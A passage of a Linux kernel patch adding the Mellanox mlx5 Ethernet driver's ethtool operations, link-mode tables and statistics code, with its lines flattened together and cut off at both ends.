MLX5E_50GBASE_KR2 = 31, + MLX5E_LINK_MODES_NUMBER, +}; + +#define MLX5E_PROT_MASK(link_mode) (1 << link_mode) + +u16 mlx5e_select_queue(struct net_device *dev, struct sk_buff *skb, + void *accel_priv, select_queue_fallback_t fallback); +netdev_tx_t mlx5e_xmit(struct sk_buff *skb, struct net_device *dev); +netdev_tx_t mlx5e_xmit_multi_tc(struct sk_buff *skb, struct net_device *dev); + +void mlx5e_completion_event(struct mlx5_core_cq *mcq); +void mlx5e_cq_error_event(struct mlx5_core_cq *mcq, enum mlx5_event event); +int mlx5e_napi_poll(struct napi_struct *napi, int budget); +bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq); +bool mlx5e_poll_rx_cq(struct mlx5e_cq *cq, int budget); +bool mlx5e_post_rx_wqes(struct mlx5e_rq *rq); +struct mlx5_cqe64 *mlx5e_get_cqe(struct mlx5e_cq *cq); + +void mlx5e_update_stats(struct mlx5e_priv *priv); + +int mlx5e_open_flow_table(struct mlx5e_priv *priv); +void mlx5e_close_flow_table(struct mlx5e_priv *priv); +void mlx5e_init_eth_addr(struct mlx5e_priv *priv); +void mlx5e_set_rx_mode_core(struct mlx5e_priv *priv); +void mlx5e_set_rx_mode_work(struct work_struct *work); + +int mlx5e_vlan_rx_add_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid); +int mlx5e_vlan_rx_kill_vid(struct net_device *dev, __always_unused __be16 proto, + u16 vid); +void mlx5e_enable_vlan_filter(struct mlx5e_priv *priv); +void mlx5e_disable_vlan_filter(struct mlx5e_priv *priv); +int mlx5e_add_all_vlan_rules(struct mlx5e_priv *priv); +void mlx5e_del_all_vlan_rules(struct mlx5e_priv *priv); + +int mlx5e_open_locked(struct net_device *netdev); +int mlx5e_close_locked(struct net_device *netdev); +int mlx5e_update_priv_params(struct mlx5e_priv *priv, + struct mlx5e_params *new_params); + +static inline void mlx5e_tx_notify_hw(struct mlx5e_sq *sq, + struct mlx5e_tx_wqe *wqe) +{ + /* ensure wqe is visible to device before updating 
doorbell record */ + dma_wmb(); + + *sq->wq.db = cpu_to_be32(sq->pc); + + /* ensure doorbell record is visible to device before ringing the + * doorbell + */ + wmb(); + + mlx5_write64((__be32 *)&wqe->ctrl, + sq->uar_map + MLX5_BF_OFFSET + sq->bf_offset, + NULL); + + sq->bf_offset ^= sq->bf_buf_size; +} + +static inline void mlx5e_cq_arm(struct mlx5e_cq *cq) +{ + struct mlx5_core_cq *mcq; + + mcq = &cq->mcq; + mlx5_cq_arm(mcq, MLX5_CQ_DB_REQ_NOT, mcq->uar->map, NULL, cq->wq.cc); +} + +extern const struct ethtool_ops mlx5e_ethtool_ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c new file mode 100644 index 000000000000..de7aec8abca1 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c @@ -0,0 +1,679 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#include "en.h" + +static void mlx5e_get_drvinfo(struct net_device *dev, + struct ethtool_drvinfo *drvinfo) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + struct mlx5_core_dev *mdev = priv->mdev; + + strlcpy(drvinfo->driver, DRIVER_NAME, sizeof(drvinfo->driver)); + strlcpy(drvinfo->version, DRIVER_VERSION " (" DRIVER_RELDATE ")", + sizeof(drvinfo->version)); + snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version), + "%d.%d.%d", + fw_rev_maj(mdev), fw_rev_min(mdev), fw_rev_sub(mdev)); + strlcpy(drvinfo->bus_info, pci_name(mdev->pdev), + sizeof(drvinfo->bus_info)); +} + +static const struct { + u32 supported; + u32 advertised; + u32 speed; +} ptys2ethtool_table[MLX5E_LINK_MODES_NUMBER] = { + [MLX5E_1000BASE_CX_SGMII] = { + .supported = SUPPORTED_1000baseKX_Full, + .advertised = ADVERTISED_1000baseKX_Full, + .speed = 1000, + }, + [MLX5E_1000BASE_KX] = { + .supported = SUPPORTED_1000baseKX_Full, + .advertised = ADVERTISED_1000baseKX_Full, + .speed = 1000, + }, + [MLX5E_10GBASE_CX4] = { + .supported = SUPPORTED_10000baseKX4_Full, + .advertised = ADVERTISED_10000baseKX4_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_KX4] = { + .supported = SUPPORTED_10000baseKX4_Full, + .advertised = ADVERTISED_10000baseKX4_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_KR] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_20GBASE_KR2] = { + .supported = SUPPORTED_20000baseKR2_Full, + .advertised = ADVERTISED_20000baseKR2_Full, + .speed = 20000, + }, + [MLX5E_40GBASE_CR4] = { + .supported = SUPPORTED_40000baseCR4_Full, + .advertised = ADVERTISED_40000baseCR4_Full, + .speed = 40000, + }, + [MLX5E_40GBASE_KR4] = { + .supported = SUPPORTED_40000baseKR4_Full, + .advertised = ADVERTISED_40000baseKR4_Full, + .speed = 40000, + }, + [MLX5E_56GBASE_R4] = { + .supported = SUPPORTED_56000baseKR4_Full, + .advertised = ADVERTISED_56000baseKR4_Full, + .speed = 56000, + }, + [MLX5E_10GBASE_CR] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_SR] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_10GBASE_ER] = { + .supported = SUPPORTED_10000baseKR_Full, + .advertised = ADVERTISED_10000baseKR_Full, + .speed = 10000, + }, + [MLX5E_40GBASE_SR4] = { + .supported = SUPPORTED_40000baseSR4_Full, + .advertised = ADVERTISED_40000baseSR4_Full, + .speed = 40000, + }, + [MLX5E_40GBASE_LR4] = { + .supported = SUPPORTED_40000baseLR4_Full, + .advertised = ADVERTISED_40000baseLR4_Full, + .speed = 40000, + }, + [MLX5E_100GBASE_CR4] = { + .speed = 100000, + }, + [MLX5E_100GBASE_SR4] = { + .speed = 100000, + }, + [MLX5E_100GBASE_KR4] = { + .speed = 100000, + }, + [MLX5E_100GBASE_LR4] = { + .speed = 100000, + }, + [MLX5E_100BASE_TX] = { + .speed = 100, + }, + [MLX5E_100BASE_T] = { + .supported = SUPPORTED_100baseT_Full, + .advertised = ADVERTISED_100baseT_Full, + .speed = 100, + }, + [MLX5E_10GBASE_T] = { + .supported = SUPPORTED_10000baseT_Full, + .advertised = ADVERTISED_10000baseT_Full, + .speed = 1000, + }, + [MLX5E_25GBASE_CR] = { + .speed = 25000, + }, + [MLX5E_25GBASE_KR] = { + .speed = 25000, + }, + [MLX5E_25GBASE_SR] = { + .speed = 25000, + }, + [MLX5E_50GBASE_CR2] = { + .speed = 50000, + }, + [MLX5E_50GBASE_KR2] = { + .speed = 50000, + }, +}; + +static int mlx5e_get_sset_count(struct net_device *dev, int sset) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + switch (sset) { + case 
ETH_SS_STATS: + return NUM_VPORT_COUNTERS + + priv->params.num_channels * NUM_RQ_STATS + + priv->params.num_channels * priv->num_tc * + NUM_SQ_STATS; + /* fallthrough */ + default: + return -EOPNOTSUPP; + } +} + +static void mlx5e_get_strings(struct net_device *dev, + uint32_t stringset, uint8_t *data) +{ + int i, j, tc, idx = 0; + struct mlx5e_priv *priv = netdev_priv(dev); + + switch (stringset) { + case ETH_SS_PRIV_FLAGS: + break; + + case ETH_SS_TEST: + break; + + case ETH_SS_STATS: + /* VPORT counters */ + for (i = 0; i < NUM_VPORT_COUNTERS; i++) + strcpy(data + (idx++) * ETH_GSTRING_LEN, + vport_strings[i]); + + /* per channel counters */ + for (i = 0; i < priv->params.num_channels; i++) + for (j = 0; j < NUM_RQ_STATS; j++) + sprintf(data + (idx++) * ETH_GSTRING_LEN, + "rx%d_%s", i, rq_stats_strings[j]); + + for (i = 0; i < priv->params.num_channels; i++) + for (tc = 0; tc < priv->num_tc; tc++) + for (j = 0; j < NUM_SQ_STATS; j++) + sprintf(data + + (idx++) * ETH_GSTRING_LEN, + "tx%d_%d_%s", i, tc, + sq_stats_strings[j]); + break; + } +} + +static void mlx5e_get_ethtool_stats(struct net_device *dev, + struct ethtool_stats *stats, u64 *data) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int i, j, tc, idx = 0; + + if (!data) + return; + + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_update_stats(priv); + mutex_unlock(&priv->state_lock); + + for (i = 0; i < NUM_VPORT_COUNTERS; i++) + data[idx++] = ((u64 *)&priv->stats.vport)[i]; + + /* per channel counters */ + for (i = 0; i < priv->params.num_channels; i++) + for (j = 0; j < NUM_RQ_STATS; j++) + data[idx++] = !test_bit(MLX5E_STATE_OPENED, + &priv->state) ? 0 : + ((u64 *)&priv->channel[i]->rq.stats)[j]; + + for (i = 0; i < priv->params.num_channels; i++) + for (tc = 0; tc < priv->num_tc; tc++) + for (j = 0; j < NUM_SQ_STATS; j++) + data[idx++] = !test_bit(MLX5E_STATE_OPENED, + &priv->state) ? 
0 : + ((u64 *)&priv->channel[i]->sq[tc].stats)[j]; +} + +static void mlx5e_get_ringparam(struct net_device *dev, + struct ethtool_ringparam *param) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + param->rx_max_pending = 1 << MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE; + param->tx_max_pending = 1 << MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE; + param->rx_pending = 1 << priv->params.log_rq_size; + param->tx_pending = 1 << priv->params.log_sq_size; +} + +static int mlx5e_set_ringparam(struct net_device *dev, + struct ethtool_ringparam *param) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + struct mlx5e_params new_params; + u16 min_rx_wqes; + u8 log_rq_size; + u8 log_sq_size; + int err = 0; + + if (param->rx_jumbo_pending) { + netdev_info(dev, "%s: rx_jumbo_pending not supported\n", + __func__); + return -EINVAL; + } + if (param->rx_mini_pending) { + netdev_info(dev, "%s: rx_mini_pending not supported\n", + __func__); + return -EINVAL; + } + if (param->rx_pending < (1 << MLX5E_PARAMS_MINIMUM_LOG_RQ_SIZE)) { + netdev_info(dev, "%s: rx_pending (%d) < min (%d)\n", + __func__, param->rx_pending, + 1 << MLX5E_PARAMS_MINIMUM_LOG_RQ_SIZE); + return -EINVAL; + } + if (param->rx_pending > (1 << MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE)) { + netdev_info(dev, "%s: rx_pending (%d) > max (%d)\n", + __func__, param->rx_pending, + 1 << MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE); + return -EINVAL; + } + if (param->tx_pending < (1 << MLX5E_PARAMS_MINIMUM_LOG_SQ_SIZE)) { + netdev_info(dev, "%s: tx_pending (%d) < min (%d)\n", + __func__, param->tx_pending, + 1 << MLX5E_PARAMS_MINIMUM_LOG_SQ_SIZE); + return -EINVAL; + } + if (param->tx_pending > (1 << MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE)) { + netdev_info(dev, "%s: tx_pending (%d) > max (%d)\n", + __func__, param->tx_pending, + 1 << MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE); + return -EINVAL; + } + + log_rq_size = order_base_2(param->rx_pending); + log_sq_size = order_base_2(param->tx_pending); + min_rx_wqes = min_t(u16, param->rx_pending - 1, + MLX5E_PARAMS_DEFAULT_MIN_RX_WQES); + + if (log_rq_size == priv->params.log_rq_size && + log_sq_size == priv->params.log_sq_size && + min_rx_wqes == priv->params.min_rx_wqes) + return 0; + + mutex_lock(&priv->state_lock); + new_params = priv->params; + new_params.log_rq_size = log_rq_size; + new_params.log_sq_size = log_sq_size; + new_params.min_rx_wqes = min_rx_wqes; + err = mlx5e_update_priv_params(priv, &new_params); + mutex_unlock(&priv->state_lock); + + return err; +} + +static void mlx5e_get_channels(struct net_device *dev, + struct ethtool_channels *ch) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ncv = priv->mdev->priv.eq_table.num_comp_vectors; + + ch->max_combined = ncv; + ch->combined_count = priv->params.num_channels; +} + +static int mlx5e_set_channels(struct net_device *dev, + struct ethtool_channels *ch) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ncv = priv->mdev->priv.eq_table.num_comp_vectors; + unsigned int count = ch->combined_count; + struct mlx5e_params new_params; + int err = 0; + + if (!count) { + netdev_info(dev, "%s: combined_count=0 not supported\n", + __func__); + return -EINVAL; + } + if (ch->rx_count || ch->tx_count) { + netdev_info(dev, "%s: separate rx/tx count not supported\n", + __func__); + return -EINVAL; + } + if (count > ncv) { + netdev_info(dev, "%s: count (%d) > max (%d)\n", + __func__, count, ncv); + return -EINVAL; + } + + if (priv->params.num_channels == count) + return 0; + + mutex_lock(&priv->state_lock); + new_params = priv->params; + new_params.num_channels = count; + err = 
mlx5e_update_priv_params(priv, &new_params); + mutex_unlock(&priv->state_lock); + + return err; +} + +static int mlx5e_get_coalesce(struct net_device *netdev, + struct ethtool_coalesce *coal) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + coal->rx_coalesce_usecs = priv->params.rx_cq_moderation_usec; + coal->rx_max_coalesced_frames = priv->params.rx_cq_moderation_pkts; + coal->tx_coalesce_usecs = priv->params.tx_cq_moderation_usec; + coal->tx_max_coalesced_frames = priv->params.tx_cq_moderation_pkts; + + return 0; +} + +static int mlx5e_set_coalesce(struct net_device *netdev, + struct ethtool_coalesce *coal) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5e_channel *c; + int tc; + int i; + + priv->params.tx_cq_moderation_usec = coal->tx_coalesce_usecs; + priv->params.tx_cq_moderation_pkts = coal->tx_max_coalesced_frames; + priv->params.rx_cq_moderation_usec = coal->rx_coalesce_usecs; + priv->params.rx_cq_moderation_pkts = coal->rx_max_coalesced_frames; + + for (i = 0; i < priv->params.num_channels; ++i) { + c = priv->channel[i]; + + for (tc = 0; tc < c->num_tc; tc++) { + mlx5_core_modify_cq_moderation(mdev, + &c->sq[tc].cq.mcq, + coal->tx_coalesce_usecs, + coal->tx_max_coalesced_frames); + } + + mlx5_core_modify_cq_moderation(mdev, &c->rq.cq.mcq, + coal->rx_coalesce_usecs, + coal->rx_max_coalesced_frames); + } + + return 0; +} + +static u32 ptys2ethtool_supported_link(u32 eth_proto_cap) +{ + int i; + u32 supported_modes = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (eth_proto_cap & MLX5E_PROT_MASK(i)) + supported_modes |= ptys2ethtool_table[i].supported; + } + return supported_modes; +} + +static u32 ptys2ethtool_adver_link(u32 eth_proto_cap) +{ + int i; + u32 advertising_modes = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (eth_proto_cap & MLX5E_PROT_MASK(i)) + advertising_modes |= ptys2ethtool_table[i].advertised; + } + return advertising_modes; +} + +static u32 ptys2ethtool_supported_port(u32 eth_proto_cap) +{ + if (eth_proto_cap & (MLX5E_PROT_MASK(MLX5E_10GBASE_CR) + | MLX5E_PROT_MASK(MLX5E_10GBASE_SR) + | MLX5E_PROT_MASK(MLX5E_40GBASE_CR4) + | MLX5E_PROT_MASK(MLX5E_40GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_100GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_1000BASE_CX_SGMII))) { + return SUPPORTED_FIBRE; + } + + if (eth_proto_cap & (MLX5E_PROT_MASK(MLX5E_100GBASE_KR4) + | MLX5E_PROT_MASK(MLX5E_40GBASE_KR4) + | MLX5E_PROT_MASK(MLX5E_10GBASE_KR) + | MLX5E_PROT_MASK(MLX5E_10GBASE_KX4) + | MLX5E_PROT_MASK(MLX5E_1000BASE_KX))) { + return SUPPORTED_Backplane; + } + return 0; +} + +static void get_speed_duplex(struct net_device *netdev, + u32 eth_proto_oper, + struct ethtool_cmd *cmd) +{ + int i; + u32 speed = SPEED_UNKNOWN; + u8 duplex = DUPLEX_UNKNOWN; + + if (!netif_carrier_ok(netdev)) + goto out; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (eth_proto_oper & MLX5E_PROT_MASK(i)) { + speed = ptys2ethtool_table[i].speed; + duplex = DUPLEX_FULL; + break; + } + } +out: + ethtool_cmd_speed_set(cmd, speed); + cmd->duplex = duplex; +} + +static void get_supported(u32 eth_proto_cap, u32 *supported) +{ + *supported |= ptys2ethtool_supported_port(eth_proto_cap); + *supported |= ptys2ethtool_supported_link(eth_proto_cap); + *supported |= SUPPORTED_Pause | SUPPORTED_Asym_Pause; +} + +static void get_advertising(u32 eth_proto_cap, u8 tx_pause, + u8 rx_pause, u32 *advertising) +{ + *advertising |= ptys2ethtool_adver_link(eth_proto_cap); + *advertising |= tx_pause ? 
ADVERTISED_Pause : 0; + *advertising |= (tx_pause ^ rx_pause) ? ADVERTISED_Asym_Pause : 0; +} + +static u8 get_connector_port(u32 eth_proto) +{ + if (eth_proto & (MLX5E_PROT_MASK(MLX5E_10GBASE_SR) + | MLX5E_PROT_MASK(MLX5E_40GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_100GBASE_SR4) + | MLX5E_PROT_MASK(MLX5E_1000BASE_CX_SGMII))) { + return PORT_FIBRE; + } + + if (eth_proto & (MLX5E_PROT_MASK(MLX5E_40GBASE_CR4) + | MLX5E_PROT_MASK(MLX5E_10GBASE_CR) + | MLX5E_PROT_MASK(MLX5E_100GBASE_CR4))) { + return PORT_DA; + } + + if (eth_proto & (MLX5E_PROT_MASK(MLX5E_10GBASE_KX4) + | MLX5E_PROT_MASK(MLX5E_10GBASE_KR) + | MLX5E_PROT_MASK(MLX5E_40GBASE_KR4) + | MLX5E_PROT_MASK(MLX5E_100GBASE_KR4))) { + return PORT_NONE; + } + + return PORT_OTHER; +} + +static void get_lp_advertising(u32 eth_proto_lp, u32 *lp_advertising) +{ + *lp_advertising = ptys2ethtool_adver_link(eth_proto_lp); +} + +static int mlx5e_get_settings(struct net_device *netdev, + struct ethtool_cmd *cmd) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + u32 eth_proto_cap; + u32 eth_proto_admin; + u32 eth_proto_lp; + u32 eth_proto_oper; + int err; + + err = mlx5_query_port_ptys(mdev, out, sizeof(out), MLX5_PTYS_EN); + + if (err) { + netdev_err(netdev, "%s: query port ptys failed: %d\n", + __func__, err); + goto err_query_ptys; + } + + eth_proto_cap = MLX5_GET(ptys_reg, out, eth_proto_capability); + eth_proto_admin = MLX5_GET(ptys_reg, out, eth_proto_admin); + eth_proto_oper = MLX5_GET(ptys_reg, out, eth_proto_oper); + eth_proto_lp = MLX5_GET(ptys_reg, out, eth_proto_lp_advertise); + + cmd->supported = 0; + cmd->advertising = 0; + + get_supported(eth_proto_cap, &cmd->supported); + get_advertising(eth_proto_admin, 0, 0, &cmd->advertising); + get_speed_duplex(netdev, eth_proto_oper, cmd); + + eth_proto_oper = eth_proto_oper ? eth_proto_oper : eth_proto_cap; + + cmd->port = get_connector_port(eth_proto_oper); + get_lp_advertising(eth_proto_lp, &cmd->lp_advertising); + + cmd->transceiver = XCVR_INTERNAL; + +err_query_ptys: + return err; +} + +static u32 mlx5e_ethtool2ptys_adver_link(u32 link_modes) +{ + u32 i, ptys_modes = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (ptys2ethtool_table[i].advertised & link_modes) + ptys_modes |= MLX5E_PROT_MASK(i); + } + + return ptys_modes; +} + +static u32 mlx5e_ethtool2ptys_speed_link(u32 speed) +{ + u32 i, speed_links = 0; + + for (i = 0; i < MLX5E_LINK_MODES_NUMBER; ++i) { + if (ptys2ethtool_table[i].speed == speed) + speed_links |= MLX5E_PROT_MASK(i); + } + + return speed_links; +} + +static int mlx5e_set_settings(struct net_device *netdev, + struct ethtool_cmd *cmd) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + u32 link_modes; + u32 speed; + u32 eth_proto_cap, eth_proto_admin; + u8 port_status; + int err; + + speed = ethtool_cmd_speed(cmd); + + link_modes = cmd->autoneg == AUTONEG_ENABLE ? 
+ mlx5e_ethtool2ptys_adver_link(cmd->advertising) : + mlx5e_ethtool2ptys_speed_link(speed); + + err = mlx5_query_port_proto_cap(mdev, &eth_proto_cap, MLX5_PTYS_EN); + if (err) { + netdev_err(netdev, "%s: query port eth proto cap failed: %d\n", + __func__, err); + goto out; + } + + link_modes = link_modes & eth_proto_cap; + if (!link_modes) { + netdev_err(netdev, "%s: Not supported link mode(s) requested", + __func__); + err = -EINVAL; + goto out; + } + + err = mlx5_query_port_proto_admin(mdev, &eth_proto_admin, MLX5_PTYS_EN); + if (err) { + netdev_err(netdev, "%s: query port eth proto admin failed: %d\n", + __func__, err); + goto out; + } + + if (link_modes == eth_proto_admin) + goto out; + + err = mlx5_set_port_proto(mdev, link_modes, MLX5_PTYS_EN); + if (err) { + netdev_err(netdev, "%s: set port eth proto admin failed: %d\n", + __func__, err); + goto out; + } + + err = mlx5_query_port_status(mdev, &port_status); + if (err) + goto out; + + if (port_status == MLX5_PORT_DOWN) + return 0; + + err = mlx5_set_port_status(mdev, MLX5_PORT_DOWN); + if (err) + goto out; + err = mlx5_set_port_status(mdev, MLX5_PORT_UP); +out: + return err; +} + +const struct ethtool_ops mlx5e_ethtool_ops = { + .get_drvinfo = mlx5e_get_drvinfo, + .get_link = ethtool_op_get_link, + .get_strings = mlx5e_get_strings, + .get_sset_count = mlx5e_get_sset_count, + .get_ethtool_stats = mlx5e_get_ethtool_stats, + .get_ringparam = mlx5e_get_ringparam, + .set_ringparam = mlx5e_set_ringparam, + .get_channels = mlx5e_get_channels, + .set_channels = mlx5e_set_channels, + .get_coalesce = mlx5e_get_coalesce, + .set_coalesce = mlx5e_set_coalesce, + .get_settings = mlx5e_get_settings, + .set_settings = mlx5e_set_settings, +}; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c new file mode 100644 index 000000000000..eee829d119f9 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -0,0 +1,1899 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE.
+ */ + +#include +#include "en.h" + +struct mlx5e_rq_param { + u32 rqc[MLX5_ST_SZ_DW(rqc)]; + struct mlx5_wq_param wq; +}; + +struct mlx5e_sq_param { + u32 sqc[MLX5_ST_SZ_DW(sqc)]; + struct mlx5_wq_param wq; +}; + +struct mlx5e_cq_param { + u32 cqc[MLX5_ST_SZ_DW(cqc)]; + struct mlx5_wq_param wq; + u16 eq_ix; +}; + +struct mlx5e_channel_param { + struct mlx5e_rq_param rq; + struct mlx5e_sq_param sq; + struct mlx5e_cq_param rx_cq; + struct mlx5e_cq_param tx_cq; +}; + +static void mlx5e_update_carrier(struct mlx5e_priv *priv) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u8 port_state; + + port_state = mlx5_query_vport_state(mdev, + MLX5_QUERY_VPORT_STATE_IN_OP_MOD_VNIC_VPORT); + + if (port_state == VPORT_STATE_UP) + netif_carrier_on(priv->netdev); + else + netif_carrier_off(priv->netdev); +} + +static void mlx5e_update_carrier_work(struct work_struct *work) +{ + struct mlx5e_priv *priv = container_of(work, struct mlx5e_priv, + update_carrier_work); + + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) + mlx5e_update_carrier(priv); + mutex_unlock(&priv->state_lock); +} + +void mlx5e_update_stats(struct mlx5e_priv *priv) +{ + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5e_vport_stats *s = &priv->stats.vport; + struct mlx5e_rq_stats *rq_stats; + struct mlx5e_sq_stats *sq_stats; + u32 in[MLX5_ST_SZ_DW(query_vport_counter_in)]; + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_vport_counter_out); + u64 tx_offload_none; + int i, j; + + out = mlx5_vzalloc(outlen); + if (!out) + return; + + /* Collect firts the SW counters and then HW for consistency */ + s->tso_packets = 0; + s->tso_bytes = 0; + s->tx_queue_stopped = 0; + s->tx_queue_wake = 0; + s->tx_queue_dropped = 0; + tx_offload_none = 0; + s->lro_packets = 0; + s->lro_bytes = 0; + s->rx_csum_none = 0; + s->rx_wqe_err = 0; + for (i = 0; i < priv->params.num_channels; i++) { + rq_stats = &priv->channel[i]->rq.stats; + + s->lro_packets += rq_stats->lro_packets; + s->lro_bytes += rq_stats->lro_bytes; + s->rx_csum_none += rq_stats->csum_none; + s->rx_wqe_err += rq_stats->wqe_err; + + for (j = 0; j < priv->num_tc; j++) { + sq_stats = &priv->channel[i]->sq[j].stats; + + s->tso_packets += sq_stats->tso_packets; + s->tso_bytes += sq_stats->tso_bytes; + s->tx_queue_stopped += sq_stats->stopped; + s->tx_queue_wake += sq_stats->wake; + s->tx_queue_dropped += sq_stats->dropped; + tx_offload_none += sq_stats->csum_offload_none; + } + } + + /* HW counters */ + memset(in, 0, sizeof(in)); + + MLX5_SET(query_vport_counter_in, in, opcode, + MLX5_CMD_OP_QUERY_VPORT_COUNTER); + MLX5_SET(query_vport_counter_in, in, op_mod, 0); + MLX5_SET(query_vport_counter_in, in, other_vport, 0); + + memset(out, 0, outlen); + + if (mlx5_cmd_exec(mdev, in, sizeof(in), out, outlen)) + goto free_out; + +#define MLX5_GET_CTR(p, x) \ + MLX5_GET64(query_vport_counter_out, p, x) + + s->rx_error_packets = + MLX5_GET_CTR(out, received_errors.packets); + s->rx_error_bytes = + MLX5_GET_CTR(out, received_errors.octets); + s->tx_error_packets = + MLX5_GET_CTR(out, transmit_errors.packets); + s->tx_error_bytes = + MLX5_GET_CTR(out, transmit_errors.octets); + + s->rx_unicast_packets = + MLX5_GET_CTR(out, received_eth_unicast.packets); + s->rx_unicast_bytes = + MLX5_GET_CTR(out, received_eth_unicast.octets); + s->tx_unicast_packets = + MLX5_GET_CTR(out, transmitted_eth_unicast.packets); + s->tx_unicast_bytes = + MLX5_GET_CTR(out, transmitted_eth_unicast.octets); + + s->rx_multicast_packets = + MLX5_GET_CTR(out, received_eth_multicast.packets); + 
s->rx_multicast_bytes = + MLX5_GET_CTR(out, received_eth_multicast.octets); + s->tx_multicast_packets = + MLX5_GET_CTR(out, transmitted_eth_multicast.packets); + s->tx_multicast_bytes = + MLX5_GET_CTR(out, transmitted_eth_multicast.octets); + + s->rx_broadcast_packets = + MLX5_GET_CTR(out, received_eth_broadcast.packets); + s->rx_broadcast_bytes = + MLX5_GET_CTR(out, received_eth_broadcast.octets); + s->tx_broadcast_packets = + MLX5_GET_CTR(out, transmitted_eth_broadcast.packets); + s->tx_broadcast_bytes = + MLX5_GET_CTR(out, transmitted_eth_broadcast.octets); + + s->rx_packets = + s->rx_unicast_packets + + s->rx_multicast_packets + + s->rx_broadcast_packets; + s->rx_bytes = + s->rx_unicast_bytes + + s->rx_multicast_bytes + + s->rx_broadcast_bytes; + s->tx_packets = + s->tx_unicast_packets + + s->tx_multicast_packets + + s->tx_broadcast_packets; + s->tx_bytes = + s->tx_unicast_bytes 